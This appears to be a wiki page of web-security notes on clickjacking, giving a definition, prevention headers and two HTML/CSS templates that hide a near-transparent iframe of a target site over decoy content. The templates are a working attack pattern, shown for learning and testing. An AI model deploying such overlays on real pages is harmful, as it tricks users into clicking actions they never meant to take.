Clickjacking

General

Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website.

Preventions:
- X-Frame-Options: deny/sameorigin/allow-from
- CSP: policy/frame-ancestors 'none/self/domain.com'

# An example using the style tag and parameters is as follows:
<head>
  <style>
    #target_website {
      position:relative;
      width:128px;
      height:128px;
      opacity:0.00001;
      z-index:2;
      }
    #decoy_website {
      position:absolute;
      width:300px;
      height:400px;
      z-index:1;
      }
  </style>
</head>
...
<body>
  <div id="decoy_website">
  ...decoy web content here...
  </div>
  <iframe id="target_website" src="https://vulnerable-website.com">
  </iframe>
</body>

<style>
   iframe {
       position:relative;
       width: 900px;
       height: 900px;
       opacity: 0.8;
       z-index: 2;
   }
   div {
       position:absolute;
       top:470px;
       left:60px;
       z-index: 1;
   }
</style>
<iframe src="https://site.com"></iframe>

PreviousWeb Cache Poisoning NextWeb Sockets

Last updated 10 months ago